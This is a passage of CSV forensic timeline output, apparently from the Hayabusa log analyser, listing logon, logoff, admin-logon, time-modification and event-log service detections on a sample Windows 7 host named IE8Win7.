+09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 